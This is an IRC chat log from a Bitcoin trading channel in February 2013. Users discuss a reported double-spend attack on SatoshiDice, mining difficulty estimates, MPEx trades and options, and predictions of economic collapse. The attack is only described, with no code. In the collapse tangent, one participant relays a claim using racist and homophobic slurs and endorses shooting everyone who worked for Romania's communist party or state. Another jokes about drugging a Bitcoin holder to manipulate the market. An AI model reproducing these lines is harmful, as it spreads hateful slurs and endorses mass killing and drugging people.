effective... Feb 22 20:42:18 evoorhees says that they do suffer double-spends from time to time Feb 22 20:42:19 maybe it was yesterday... Feb 22 20:42:47 it looked like the doublespend attack person is working with a miner Feb 22 20:42:50 and that they implement fixes accordingly Feb 22 20:43:00 the attack bets were not in my mempool Feb 22 20:43:04 but they showed up in a block Feb 22 20:43:10 swhitt i sent him a dinger. Feb 22 20:43:18 thanks for reporting. Feb 22 20:43:37 mircea_popescu: thanks, I am making a list of transactions included in the attack Feb 22 20:44:12 he's sometimes available on Skype as evoorhees Feb 22 20:44:36 DeaDTerra: what do you mean by "SatoshiDice client"? Feb 22 20:45:06 OH... ok. didn't know that. Feb 22 20:45:10 thx Feb 22 20:45:14 the client doens't let you spend unconfirmed change though Feb 22 20:45:27 mircea_popescu: nat is like asking someone else to take a piss for you Feb 22 20:45:33 ;;bc,stats Feb 22 20:45:33 pigeons yeah. Feb 22 20:45:41 you guys no like NAT 'eh? Feb 22 20:45:45 Current Blocks: 222573 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1202 blocks | Next Difficulty In About: 1 week, 0 days, 10 hours, 4 minutes, and 26 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 22 20:47:57 they no like nat. Feb 22 20:48:10 i like nat, but they say i'm a nut. Feb 22 20:48:14 ;;calc 3651011/4036526 Feb 22 20:48:14 0.904493368803 Feb 22 20:48:31 so ~9% change up Feb 22 20:49:00 was like 15%-20% yesterday I think Feb 22 20:49:02 (10:48) < mircea_popescu> i like nat, but they say i'm a nut. << for someone who isn't a programmer, you have a keen eye for what makes sense in compsci Feb 22 20:49:30 mod6 im the boss all software engineers wish they had. Feb 22 20:49:38 :] Feb 22 20:50:11 one thing that makes me laugh is about these -otc d00dz who constantly bitch about MPEx's lack of CSS or conformity to standards. Feb 22 20:50:21 its like, many lulz Feb 22 20:50:50 just a convenient topic to bitch about Feb 22 20:50:55 ThickAsThieves: the diffiulty went up that much or just the btc spot price? Feb 22 20:51:20 mod6, it was the difficulty that spiked yest Feb 22 20:51:21 myeah, otc evaporatively cooled or w/e it was Feb 22 20:51:32 Est % Change Feb 22 20:51:38 jurov i find that so odd, im still measuring the output at like 27th Feb 22 20:51:41 was that high Feb 22 20:51:42 so gribble was thinking it will got 15% up Feb 22 20:51:45 *go Feb 22 20:52:01 oh hmm. ok. didn't know that. Feb 22 20:52:03 i think it was even up to 20% Feb 22 20:52:29 and not difficulty but hashrate to be exact. Feb 22 20:53:03 i'm missing something, but why would the hashrate change so much overnight? Feb 22 20:53:19 maybe the asics made it out of tennekey Feb 22 20:53:27 but it went down Feb 22 20:53:29 it does normally, it's variance Feb 22 20:53:59 miners get more successful in finding blocks -> hashrate increas is inferred Feb 22 20:54:09 ah i see Feb 22 20:54:10 "he reason I take the time to type out a response like that is because I enjoy treating people I don’t know like they’re actual human beings, take them seriously and so forth." Feb 22 20:54:14 who said that? Feb 22 20:54:27 ThickAsThieves estimating hashrate is a very noisy process Feb 22 20:54:28 mircea_popescu just did in his blog Feb 22 20:54:29 i don't think bitcoincharts meticulusly gathers stats from the pools how many hashes got computed actually Feb 22 20:54:31 there's no actual way to measure it Feb 22 20:55:22 i was forgetting about the "luck" aspect i guess Feb 22 20:55:27 well, "just" meaning like an hour ago in here: (09:58) < mircea_popescu> http://trilema.com/2013/least-likely-to-succeed-character-the-upseller/ Feb 22 20:56:12 it's a poisson process Feb 22 20:56:42 you can estimate what lambda is by the number of occurrences per unit time Feb 22 20:56:43 dunno if it's a poisson.. we just infer from very few data points Feb 22 20:57:04 so does the difficulty prediction get more stable the closer to the end of the current diff level? Feb 22 20:57:04 and the difficulty adjustment is to get lambda back to the average time of 10 minutes Feb 22 20:57:08 if the pools exported stats about work submitted, that would be more reliable Feb 22 20:57:08 its a poisson process by definition neh ? Feb 22 20:57:20 yes it's a poisson process by definitions Feb 22 20:57:32 jurov there's no practical way for the pools to do it either, not as hashes Feb 22 20:57:45 they could perhaps report shares, but there's issues with that too (i am told, i don't really understand this) Feb 22 20:57:52 it would be more reliable but you have 20160 datapoints Feb 22 20:58:03 good enough for gubment work Feb 22 20:58:08 lol Feb 22 20:58:11 normalize it, same chart Feb 22 20:58:49 mircea_popescu: well, each pool has a different difficulty for the shares Feb 22 20:58:54 exactly. Feb 22 20:59:02 the pools must have a way to measure the work semi-precisely.. to be able to sanely compute payouts Feb 22 20:59:06 and many pools adjust diff for each user Feb 22 20:59:33 ya hta'ts what i meant, they use the per-user diff thing Feb 22 21:00:35 in the end difficulty really only takes into account really issued blocks, not the work behind them... so the point is moot Feb 22 21:00:41 probably wuile's estimates are the better thing to go by Feb 22 21:00:42 http://bitcoin.sipa.be/ Feb 22 21:01:31 http://blog.rongarret.info/2013/02/a-simple-solution-to-credit-card-fraud.html Feb 22 21:02:04 so as an exercise, what data and info would you use in assessing XDIFFMAR? Feb 22 21:02:18 jcpham lol, i said it first omg. Feb 22 21:02:40 i know its a loaded question Feb 22 21:02:51 he's on the right path... Feb 22 21:03:24 true. Feb 22 21:03:37 well im too lazy to comment on google stuff, so. Feb 22 21:03:40 he'll figure it out. Feb 22 21:03:45 ThickAsThieves, i just drawn some lines over sipa's graphs Feb 22 21:04:03 and decided it will be under 8 Feb 22 21:04:20 bu the moon and stars and technical analysis Feb 22 21:04:44 8 million Feb 22 21:05:22 were your eyes open or closed when you drew the lines? ;) Feb 22 21:05:29 moon and stars, is that like licking your finger to determine which way the wind blows? Feb 22 21:05:32 lol Feb 22 21:05:33 also sold few shares of iDiff-E on bitfunder for 0.07 hedged by bitbet but won't sell for that price anymore Feb 22 21:06:05 that is specifically what i'm assessing actually Feb 22 21:06:13 i bought at .07 Feb 22 21:06:38 so you bought and now having second thoughts ? :D Feb 22 21:07:01 mmm, it wasnt a LOT of btc Feb 22 21:07:30 just that i did base my choice on somewhat ignorant grasp of gribbles predictions Feb 22 21:07:51 i bribed gribble Feb 22 21:08:12 don't trust him Feb 22 21:08:18 i knew it Feb 22 21:09:24 ;;bribe gribble Feb 22 21:09:24 Error: "bribe" is not a valid command. Feb 22 21:09:30 lies. Feb 22 21:09:56 ;;sudo bribe Feb 22 21:09:56 do it yourself, punk. Feb 22 21:09:58 hax Feb 22 21:10:03 [MPEX] [S.MPOE] 7009 @ 0.00064314 = 4.5078 BTC [+] Feb 22 21:10:04 [MPEX] [S.MPOE] 10000 @ 0.00064339 = 6.4339 BTC [+] Feb 22 21:10:10 [MPEX] [S.MPOE] 341 @ 0.0006434 = 0.2194 BTC [+] Feb 22 21:10:16 ;;donate gribble Feb 22 21:10:17 Error: "donate" is not a valid command. Feb 22 21:10:24 ;;botsnack Feb 22 21:10:24 Forget the snack, just send me some bitcoins at 1MgD6rah5zUgEGYZnNmdpnXMaDR3itKYzU :) Feb 22 21:10:25 ;;botsnack Feb 22 21:10:25 Forget the snack, just send me some bitcoins at 1MgD6rah5zUgEGYZnNmdpnXMaDR3itKYzU :) Feb 22 21:10:27 ^ Feb 22 21:10:29 ah ha Feb 22 21:10:44 finally figured it Feb 22 21:11:14 wow 269.69 received Feb 22 21:11:48 gribble is richer than most americans Feb 22 21:11:49 you guys suck...my most recent snack is still the last botsnack Feb 22 21:12:00 0.01 Feb 22 21:12:01 mircea_popescu that is funny Feb 22 21:12:02 isn't that a depressing thought Feb 22 21:12:02 lol Feb 22 21:12:04 mircea_popescu: yeah, this is probably true. Feb 22 21:12:31 i'm trying to understand the differences between the exchange on weex and the bitfunder fiat assets Feb 22 21:12:39 mircea_popescu, errr. except gribble can't spend the money without nanotube Feb 22 21:12:41 mod6 i dunno, i vaguely recall reading the avg net worth is teetering towards negative. Feb 22 21:12:49 yeah, it seems to me that just about NO ONE has any cash to spare. anyone who works a "regular" type job anyway... Feb 22 21:13:03 chmod755 not necessarily a bad thing that :p Feb 22 21:14:42 people here wont put up with this for forever. eventually when food and gas prices get high enough... RAGE AGAINST THE MACHINE Feb 22 21:15:08 pigeons, the main difference is you can use different words when you talk about your transactions now :) Feb 22 21:15:23 mod6 you think ? Feb 22 21:15:30 i feel it. Feb 22 21:15:34 people here are angry Feb 22 21:15:42 ThickAsThieves i like the part of "buy dollars with bitcoins" tbh. Feb 22 21:15:52 mod6 ya but against the machine ? i imagine it'll be more against each other. Feb 22 21:16:00 they know they're angry. im not sure they can put a finger on it yet... Feb 22 21:16:01 the govt will be fine for a while yet. Feb 22 21:16:14 they don't realize quite what is happening too much disinformation Feb 22 21:16:37 but someday, it will become clear. (maybe when gas hits $20/gal) and a loaf of bread is $25 Feb 22 21:16:42 then RAGE Feb 22 21:16:49 yeah. for instance, i heard today that the irs a. moved the start of filling from 15th to 31th january Feb 22 21:16:57 and also doesn't have the forms ready, so you can't file Feb 22 21:17:02 but it won't extend the deadline either. Feb 22 21:17:09 this is nowhere on the news. Feb 22 21:17:25 the fact that obama is a chicken eating nigger faggot or whatever, THAT is all over the news Feb 22 21:17:27 one thing i dont get is, how can the irs even pretend to be able to verify tax returns? Feb 22 21:17:29 as if anyone actually cares. Feb 22 21:17:34 no, state media outlets wont publish any of these kind of things... quelling the masses. Feb 22 21:17:46 how many audits can they really do Feb 22 21:18:25 ThickAsThieves well, it's an intimidation racket mostly. Feb 22 21:18:28 people here are beginning to understand the depth of debt problems... they don't understand the fine points, but they know that it can't be good that the fedz owe $16tn Feb 22 21:18:29 mircea_popescu: did you see the moneyness blog article about bitcoin securities? Feb 22 21:18:37 oh you wish there will be rage. they invent yet another war, the more nonsensical, the better Feb 22 21:18:38 lyspooner have not. link ? Feb 22 21:18:53 jurov maybe they finalyl invade canada Feb 22 21:18:54 http://jpkoning.blogspot.ca/2013/02/financial-deepening-and-currency.html Feb 22 21:18:58 like it was foretold in fallout 2. Feb 22 21:19:27 jurov: i hope that people here will realize the fleecing that has happened here and hold the parties responsible. Feb 22 21:19:30 soon. Feb 22 21:19:35 very soon. Feb 22 21:20:02 "Eichengreen's theory is that the US dollar became the world's go-to currency because of the emergence of a very specific financial instrument—the banker's acceptance." Feb 22 21:20:04 certainly. Feb 22 21:20:04 if they didn't realize it so far... they'll be too embarrassed to admit it now Feb 22 21:20:26 huh now that's a good point. Feb 22 21:20:52 [MPEX] [S.MPOE] 24700 @ 0.0006434 = 15.892 BTC [+] Feb 22 21:21:02 yeah but embarrassed isn't really a problem. it doesnt feel good either way to have your wealth stripped away by corporations and banksters. Feb 22 21:21:21 at first they will blame themselfs for being too ingnorant or some such thing... Feb 22 21:21:27 but then their anger will be directed outward. Feb 22 21:21:32 thats the RATM part. Feb 22 21:21:49 lyspooner he lists picostocks. da fuck is wrong with people. Feb 22 21:22:48 most people feel helpless against the in the face of big bro. so i think people are just waiting for it to implode on itself. which it will... but there will be twists and turns in the road. Feb 22 21:23:30 i was reading a good analysis how overthrowing governments happened only after food prices rose out of reach. there was NO other correlation found Feb 22 21:23:54 starving people have much power Feb 22 21:23:56 govt can do prettny much whatever it wants, as long ppl are fed Feb 22 21:23:58 oh, mircea_popescu, i see you already posted a comment on that site Feb 22 21:24:01 yeah, no one really gives a shit about government until it gets in the way of feeding yourself and your family. Feb 22 21:24:27 then the torches+pitch-forks come out. Feb 22 21:24:40 lyspooner i have ? Feb 22 21:24:43 i mean i did just now Feb 22 21:25:12 gwern right? Feb 22 21:26:27 what's that mtgox page that shows bid ask walls? Feb 22 21:26:27 (11:15) < mircea_popescu> mod6 ya but against the machine ? i imagine it'll be more against each other. << not sure this can be avoided any more. people are wholly divided. Feb 22 21:26:28 no ? Feb 22 21:26:42 iz ,mtgoxlive.com Feb 22 21:26:52 I guess I hope that people can come together and clean house entirely at all levels of government. Feb 22 21:27:20 i'm thinking of that static page.. Feb 22 21:27:24 never gonna happen mod6. Feb 22 21:27:27 I would think that all politics are local, so it just depends on where you're at. But there will be two sides. Feb 22 21:27:44 romanians for instance had a much better shot in 1989, and still we didn't round them up and shoot the lot. Feb 22 21:27:57 which i still say would have been the correct solution. Feb 22 21:28:11 you did get the president and his wife thought right? Feb 22 21:28:12 exactly Feb 22 21:28:25 mod6 ya. Feb 22 21:28:31 *nod* i remember that. Feb 22 21:28:40 well, the president and the vice president or w/e Feb 22 21:28:44 mod6, forget the president.. here whole secret service turned into "entrepreneurs" Feb 22 21:28:47 ah. Feb 22 21:28:54 wasn't on the grounds of being the wife, was on the grounds of being pretty much the #2 Feb 22 21:29:10 ahh i see. Feb 22 21:29:26 i remember it on tv. it was like, quick trial, then outback to the woodshed. Feb 22 21:29:34 on christmas eve Feb 22 21:29:39 Ahh thats right! Feb 22 21:29:44 half hour before abolishing the deathpenalty. Feb 22 21:29:46 mod6, and the same will happen everywhere... intelligent people will see the system as unsustainable, they'll plan exit routes accordingly Feb 22 21:29:47 merry christmas, you are free. Feb 22 21:30:12 the trial was a monstrosity tho. Feb 22 21:30:30 i don't remember the details.. i guess I was only 9. Feb 22 21:30:36 http://trilema.com/2011/procesul-ceausescu/ there's the full thing adnotated. (in romanian) Feb 22 21:30:47 oh cool. :) Feb 22 21:30:50 possibly the worst kangoroo court i ever saw. Feb 22 21:31:26 [MPEX] [S.MPOE] 11450 @ 0.0006434 = 7.3669 BTC [+] Feb 22 21:31:28 yeah, it was def. a kangoroo deal, i do remember that. I think they typically are after the revolutionaries take over. Feb 22 21:31:44 ya but this was a brand apart. Feb 22 21:31:54 the judge was prosecuting from the bench for crying out loud Feb 22 21:32:15 oh.. yeah. that doesn't seem like it should make sense. couldn't the people put a good enough case together? Feb 22 21:32:24 nope. Feb 22 21:32:34 you couldn't find five people who could actually argue a case atthe time. Feb 22 21:32:38 and i mean that literally. Feb 22 21:33:45 well, that happens sometimes. im not sure that we have a lot of lawyers who could successfully prosecute any of the banksters or government officials who've broken the law. Feb 22 21:34:00 but anyway, it was something like Francis Biddle or whoever being Indian and going "you're a bad man, you're a very very bad man" at Goebbels. Feb 22 21:34:13 i mean, it is a raquette and a mob of sorts after all. Feb 22 21:34:22 racket ? Feb 22 21:34:44 http://www.youtube.com/watch?v=VN29X2HCKpU this guy. Feb 22 21:34:44 mircea, and you think if you started to shot communists, would that happen anywhere near accurately and effectively? Feb 22 21:34:54 better not think about it Feb 22 21:35:00 yeah, for some reason i thought the crime related racket had a different speling. Feb 22 21:35:06 *spelling... damn i suck at spelling Feb 22 21:35:11 jurov anyone who ever worked for either the party or the state, bang. simple solution. Feb 22 21:35:25 be left with half the population maybe, and a clear point in mind. don't do that. Feb 22 21:36:04 [MPEX] [S.MPOE] 15657 @ 0.0006434 = 10.0737 BTC [+] Feb 22 21:36:42 hmm.. yeah there are a lot of people who work in goverment here, and its getting larger. Feb 22 21:36:44 hm, last time such thing happened with any success was probably when israelites fled egypt Feb 22 21:37:02 it used to be that you didn't want to work for government ever, unless you were already rich and "heard the call of duty" Feb 22 21:37:04 hey, im not saying it's practical. Feb 22 21:37:04 and torah was written by winning side anyway Feb 22 21:37:09 now its like people aspire to work for big bro. Feb 22 21:37:12 its crazy. Feb 22 21:37:12 it never is practical. Feb 22 21:40:39 (11:29) < jurov> mod6, and the same will happen everywhere... intelligent people will see the system as unsustainable, they'll plan exit routes accordingly << some might. Feb 22 21:41:19 people are waking up to all of this (four years later I'll add) but there is so much disinformation out there... think frog in pot Feb 22 21:41:20 not might, they will do. and even if not, in the chaos the'yll have advantage of web of contacts. Feb 22 21:41:44 [MPEX] [S.MPOE] 4321 @ 0.00063935 = 2.7626 BTC [-] Feb 22 21:41:46 [MPEX] [S.MPOE] 4999 @ 0.00063928 = 3.1958 BTC [-] Feb 22 21:41:48 [MPEX] [S.MPOE] 1000 @ 0.00063927 = 0.6393 BTC [-] Feb 22 21:41:49 [MPEX] [S.MPOE] 821 @ 0.00063926 = 0.5248 BTC [-] Feb 22 21:41:51 [MPEX] [S.MPOE] 510 @ 0.00063916 = 0.326 BTC [-] Feb 22 21:42:32 and since this is like the matrix, anyone who has any wealth left defends the system. Feb 22 21:42:51 they're so hoplessly dependant upon easy credit and the system they'll fight to defend it. Feb 22 21:42:58 until it all comes to a screeching hault. Feb 22 21:43:03 then RATM Feb 22 21:43:54 mod6, what timeline do you expect this to happen Feb 22 21:44:02 mod6, read this: http://www.fromthewilderness.com/free/ww3/060105_soviet_lessons.shtml Feb 22 21:44:19 and get inspired. some things will come to halt, some do not. Feb 22 21:45:06 lyspooner: i figure 3 years or less. Feb 22 21:45:12 as soon as they cut off the SNAP cards. Feb 22 21:45:39 What happens when a modern economy collapses, and the complex society it supports disintegrates? A look at a country that has recently undergone such an experience can be most educational. Feb 22 21:45:51 it's quite long but i thoroughly enjoyed it Feb 22 21:46:45 jurov it will be horrible for many of the tense spots. new york, largely boston, most of california Feb 22 21:46:53 the midwest will be mostly fine, even make a pretty penny. Feb 22 21:47:41 maybe. barring any serious climate problems Feb 22 21:48:14 the problem with california is water really. Feb 22 21:48:35 the problems with new york are too many to list. Feb 22 21:48:40 Whelp.... Guess I shouldn't be moving to LA Feb 22 21:49:16 yeah, they wanted me to move to mountain view this year. i was like "LOL yeah right..." Feb 22 21:49:27 Bugpowder it's a tense place to be in, if shtf. Feb 22 21:49:30 oh boy Feb 22 21:49:34 big wall Feb 22 21:49:36 at 31 now Feb 22 21:50:01 Well... I don't think the fan will be hit Feb 22 21:50:31 Time to buy some fresh real estate in downtown Santa Monica Feb 22 21:50:34 hmmm. Feb 22 21:50:37 and ride the next asset bubble Feb 22 21:50:49 Maybe I'm way off and this comedy will continue for 50 years... Feb 22 21:50:58 while you guys are all stressing about the end of the system. I'm going ride it up again. Feb 22 21:51:15 all ponzi schemes do come to an end though... Feb 22 21:51:29 Bugpowder: enjoy it while it lasts dude. Feb 22 21:51:53 yes but there are many ways it could play out Feb 22 21:51:55 but when the music stops, I hope you're not long. Feb 22 21:52:14 Are we talking about global debt crisis or bitcoin prices, BTW? Feb 22 21:52:25 I came in late Feb 22 21:52:29 hhaha, even if you are and your portfolio is worth 100bn, you won't be able to buy 6 eggs with that. Feb 22 21:52:40 uhhh.... Feb 22 21:52:42 no Feb 22 21:52:49 lol no!? Feb 22 21:52:53 think zimbabwe Feb 22 21:53:04 yes Feb 22 21:53:08 how is that relevant? Feb 22 21:53:38 Bugpowder topic was us collapse not btc. Feb 22 21:53:43 im like wtf Feb 22 21:53:45 and ftr i didn't start it. Feb 22 21:53:48 ok i gotta get some thing to eat. Feb 22 21:53:50 brb. Feb 22 21:53:57 i started it. Feb 22 21:54:01 bbs. Feb 22 21:55:20 short term top? Feb 22 21:55:23 in BTC? Feb 22 21:55:48 sounds like society collapse Feb 22 21:56:27 the end of the world is nigh! Feb 22 21:56:43 eat your girlfriends and fuck your wine for that's all you take with you! Feb 22 21:56:59 The society collapse narrative is really driven by people that want to sell you gold, guns and ammo. Feb 22 21:57:17 Bugpowder nah Feb 22 21:57:29 the society collapse narrative has been a mainstay of human culture for as long as such existed Feb 22 21:57:35 yah Feb 22 21:57:36 ok Feb 22 21:57:38 tru Feb 22 21:57:45 it was discussed in the same terms and with the same motivs in like 1400 Feb 22 21:57:48 we have records. Feb 22 21:57:54 instead of sacrificing people to the volcano Feb 22 21:58:00 to stave off destruction Feb 22 21:58:11 buy gold and bury it in your backyard Feb 22 21:58:39 or bitcoins Feb 22 21:58:42 buy bitcoins Feb 22 21:59:28 the thing is tho, human society does collapse periodically. Feb 22 21:59:42 i don't believe in some value tokens so much. i think rather having web of out-of-box thinking people is the key to survival. Feb 22 22:00:01 also a very good point Feb 22 22:00:07 by the way, you'll come around some tokens, too Feb 22 22:00:21 jurov now you know why the secret service people ended up entrepreneurs Feb 22 22:00:34 in catastrophic situations knowing the right people is most valuable. Feb 22 22:01:04 mircea_popescu: what are a couple example of societal collapse? Feb 22 22:01:05 ;;ticker Feb 22 22:01:06 BTCUSD ticker | Best bid: 30.25000, Best ask: 30.66940, Bid-ask spread: 0.41940, Last trade: 30.25000, 24 hour volume: 61491.24221722, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.38573 Feb 22 22:01:11 Oh shit Feb 22 22:01:13 Drop!!! Feb 22 22:01:15 yeah Feb 22 22:01:16 TomServo the obvious one is the fall of the roman empire. Feb 22 22:01:23 TomServo, http://www.fromthewilderness.com/free/ww3/060105_soviet_lessons.shtml Feb 22 22:01:29 the old south collapsed as such after the civil war. the british empire did the same. Feb 22 22:01:41 napoelon's france collapsed, royal france collapsed before that Feb 22 22:01:46 It's driving the 24vwap up though Feb 22 22:01:46 :) Feb 22 22:01:48 chinese society collapsed like 6 or 7 times Feb 22 22:02:08 germany collapsed end of ww2, soviet empire end of cold war Feb 22 22:02:11 how many so far, a dozen ? Feb 22 22:02:13 aztecs Feb 22 22:02:18 list is pretty long. Feb 22 22:02:20 Societies do collapse Feb 22 22:02:34 the hittite empire collapsed completely. the hellenistic empire (larger than any other, incidentally) did likewise Feb 22 22:02:50 http://en.wikipedia.org/wiki/Societal_collapse#Examples_of_civilizations_and_societies_that_have_collapsed Feb 22 22:02:54 All good examples. I guess the difference this time being the 'shrinking' of the globe? Feb 22 22:02:55 BUT... the probability that in any given generation a collapse will occur rather than a muddling through is pretty low Feb 22 22:03:03 TomServo i wonder why'd it be a difference. Feb 22 22:03:16 Bugpowder black swan events. fat tail. all that jazz. Feb 22 22:03:25 I would think that the collapse would be more obvious ahead of time. Feb 22 22:03:29 nah Feb 22 22:03:37 mircea_popescu: well, the roman collapse didn't affect anything going on in america at the time. Feb 22 22:03:43 i am pretty sure the correct model for understanding them is financial crisis. Feb 22 22:03:57 TomServo so ? Feb 22 22:03:59 Like, the metro to Santa Monica is almost complete and there are some really nice parks being built. Feb 22 22:04:07 that does not smell like collapes Feb 22 22:04:24 Bugpowder some of the best surviving roman architecture is from right before and right after collapse. Feb 22 22:04:29 How many of these collapses were due to outside influence 'changing the game' Feb 22 22:04:32 in general arts trail. Feb 22 22:04:32 mircea_popescu: so america collapsing isn't going to just affect america Feb 22 22:04:44 vs internal collapse due to debt/corruption Feb 22 22:04:49 TomServo this is a theory. we have no actual history to back it yet. Feb 22 22:04:50 50% Feb 22 22:05:08 Bugpowder i don't see why you think those two are categorically distinct. seems the same thing to me. Feb 22 22:05:25 mircea_popescu: correct I'm just speculating - it just seems like common sense though. Feb 22 22:05:35 there's nothing common about sense :D Feb 22 22:05:42 with USD being the reserve currency Feb 22 22:05:46 well, getting conquered, new disease vector, etc Feb 22 22:05:47 true. Feb 22 22:06:03 Bugpowder so has china conquered the us ? Feb 22 22:06:11 no Feb 22 22:06:13 hah. Feb 22 22:06:23 if we were archeologists we'd look at the items we find and say yes it was. Feb 22 22:07:19 In 1986 everyone thought Japan owned the US and soon the world Feb 22 22:07:24 not my point tho. Feb 22 22:07:28 and germany won the WWII Feb 22 22:07:31 Perspectives can change quickly Feb 22 22:07:38 the way "conquest" is established is look at item production and distribution sources. Feb 22 22:07:57 like, buncha minoan pottery in mainland greece? minos conquered mainland greece. Feb 22 22:13:17 Can we stop the madness Feb 22 22:13:25 lets crash bitcoin.. Feb 22 22:13:28 upwards! Feb 22 22:13:30 ;;ticker Feb 22 22:13:30 BTCUSD ticker | Best bid: 30.80001, Best ask: 30.88023, Bid-ask spread: 0.08022, Last trade: 30.80001, 24 hour volume: 61512.77047919, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.38853 Feb 22 22:13:36 Good enough lol Feb 22 22:14:17 so basically... i need to add more option lines. Feb 22 22:14:26 jurov: thanks for that link Feb 22 22:14:36 Each half-liter bottle of vodka was exchanged for ten liters of gasoline, giving vodka far greater effective energy density than rocket fuel. Feb 22 22:15:11 mod6 there's an old joke, goes something like this : Feb 22 22:15:28 buncha people inside a train car stopped in the middle of nowhere. they ask the conductor why aren't they moving ? Feb 22 22:15:35 "because the engineer is changing the engine". Feb 22 22:15:44 after a few hours they get impatient Feb 22 22:15:52 "well... why are not moving still ?" Feb 22 22:16:01 "because the engineer changed the engine for a bottle of vodka. Feb 22 22:16:15 haha Feb 22 22:16:18 awesome Feb 22 22:17:13 more option lines are definitely needed Feb 22 22:17:24 i've read a lot of russian lit, and someday if things are ever better in this world, I'd like to visit. Feb 22 22:19:04 BTW your analogy about china conquering the US reflects more upon the folly of inference from archeological scraps that on the reality of the current power structure. Feb 22 22:19:12 than on Feb 22 22:19:45 Does BTCe have a deposit problem or what? Feb 22 22:19:45 http://bitcoincharts.com/markets/btceUSD.html Feb 22 22:19:52 well, i think since we owe them, and basically we buy all their shit, is that not economic conquring? Feb 22 22:21:42 any perceived risk for a retracement today? seems like there is still accelerating buying at the exchanges. Feb 22 22:21:43 http://i.imgur.com/EA4fk.jpeg Feb 22 22:21:53 Bugpowder possibly so, yes. Feb 22 22:22:07 lol jesus & meth Feb 22 22:22:08 rp44 we dunno. Feb 22 22:23:18 Man.. dice isnt doing so hot Feb 22 22:24:04 rp44 There is massive and increasing risk of retracement today Feb 22 22:24:08 and tomorrow Feb 22 22:24:16 and until it occurs Feb 22 22:24:21 :p Feb 22 22:24:23 in my perception Feb 22 22:24:26 whoa Feb 22 22:24:31 another big dump Feb 22 22:24:59 ~150K sell on mtgox absorbed in <20 mins Feb 22 22:27:20 ;;ticker Feb 22 22:27:21 MOAR volume Feb 22 22:27:22 BTCUSD ticker | Best bid: 30.53481, Best ask: 30.61690, Bid-ask spread: 0.08209, Last trade: 30.82357, 24 hour volume: 63933.39569825, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.39600 Feb 22 22:27:31 so am i adding options to 50 or to 85 ? Feb 22 22:27:35 50 Feb 22 22:27:45 69 Feb 22 22:27:48 If it gets to 40, then maybe add some more Feb 22 22:28:29 why are the next months' volumes so low? usually by this time there's some open interest worth talking about Feb 22 22:28:54 S.DICE is fine... Feb 22 22:29:15 lyspooner ikr? Feb 22 22:30:53 lyspooner: there hasn't been that much volume this moth Feb 22 22:31:03 me, Namworld and unknown other party Feb 22 22:31:11 I think were most of the action Feb 22 22:31:50 oh yeah... apparently I chose the wrong time for those options Feb 22 22:32:24 Unless someone drops 500k BTC on the market RIGHT NOW Feb 22 22:32:53 it could happen Feb 22 22:33:03 Unlikely, but... Feb 22 22:33:29 Give me an hour... :-P Feb 22 22:33:31 maybe if I drug some bitcoin big shot enough... Feb 22 22:34:30 lol Feb 22 22:34:48 I can make that person believe the price is currently 0.30 USD/BTC and he should stop loss... Feb 22 22:39:31 lol Feb 22 22:39:41 it would take a million and a half to move it to 28 i think Feb 22 22:39:49 Looks like we might have a good month for S.MPOE Feb 22 22:40:03 nice Feb 22 22:40:22 sure, lots of low calls... Feb 22 22:40:44 but 70k puts bought at 33-35... these are worth almost nothing by now. Feb 22 22:41:01 They were bought for 1+ BTC each... Feb 22 22:41:04 major burn Feb 22 22:41:15 . Feb 22 22:41:15 maybe... Feb 22 22:41:33 might have been exercised at some point between then and now. Feb 22 22:42:08 Namworld i think that was covered tho Feb 22 22:42:37 probably at some point, yes Feb 22 22:43:09 just like calls might have been executed early to take profit. It's hard to evaluate. Feb 22 22:44:43 mp, I have imported and signed the new key- It will not work until the 10th, correct Feb 22 22:46:48 Bugpowder could you get me diff futures? Feb 22 22:47:00 !ticker m X.IDIFF.MAR Feb 22 22:47:01 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07595 / 0.07595 / 0.07595 (8 shares, 0.61 BTC), 30D: 0.0429 / 0.06540414 / 0.089 (338 shares, 22.11 BTC) Feb 22 22:47:16 ;;bc,stats Feb 22 22:47:19 Current Blocks: 222590 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1185 blocks | Next Difficulty In About: 1 week, 0 days, 5 hours, 24 minutes, and 52 seconds | Next Difficulty Estimate: 4896611.1042 | Estimated Percent Change: 34.11656 Feb 22 22:47:46 thats more like it Feb 22 22:48:04 I can also get you futures Feb 22 22:52:52 [MPEX] [S.MPOE] 4321 @ 0.00064225 = 2.7752 BTC [+] Feb 22 22:52:53 [MPEX] [S.MPOE] 6000 @ 0.00064257 = 3.8554 BTC [+] Feb 22 22:52:55 [MPEX] [S.MPOE] 21500 @ 0.00064258 = 13.8155 BTC [+] Feb 22 22:52:56 [MPEX] [S.MPOE] 679 @ 0.0006434 = 0.4369 BTC [+] Feb 22 22:53:53 http://mpex.co/ Feb 22 22:53:59 new option strikes available, 5 to 75. Feb 22 22:54:15 eh, that's better Feb 22 22:54:17 the even values will be exercised normally after which they will no longer be offered. Feb 22 22:54:51 the bot is going to quote under supervision for the next hour or so, trades may be reverted. Feb 22 22:55:20 no even value? odd. Feb 22 22:55:28 lol Feb 22 22:55:35 that is EXACTLY why i picked it :D Feb 22 22:56:42 i totally can't believe i had to do this once a month ffs. Feb 22 22:56:56 eh Feb 22 22:57:14 What is "K.KBRL Pending, due klim." ? Feb 22 22:57:18 values 1 to 20 worked fine for like 6 months Feb 22 22:57:22 Well expect to repeat every few years I guess. Feb 22 22:57:29 ThickAsThieves more an inside joke than anything Feb 22 22:57:33 word Feb 22 22:57:33 Thick: It's a joke apparently Feb 22 22:58:04 [MPEX] [S.MPOE] 17311 @ 0.0006434 = 11.1379 BTC [+] Feb 22 22:58:07 thestringpuller: get you them? Feb 22 22:58:11 [MPEX] [S.MPOE] 15239 @ 0.00064369 = 9.8092 BTC [+] Feb 22 22:59:01 [15:40] but 70k puts bought at 33-35... these are worth almost nothing by now. Those were last month right? Feb 22 22:59:33 That was the 10k shorted then rebought. Feb 22 22:59:39 Oh, maybe Feb 22 22:59:39 btw, my pympex fork is already prepared for new key.. should switch itself automatically Feb 22 22:59:41 remember we are on a short moth Feb 22 22:59:42 month Feb 22 22:59:48 yeah Feb 22 22:59:54 K.KBRL seems like Ka.KoBRekLa, the manager of this channel. Feb 22 22:59:59 jurov nice! Feb 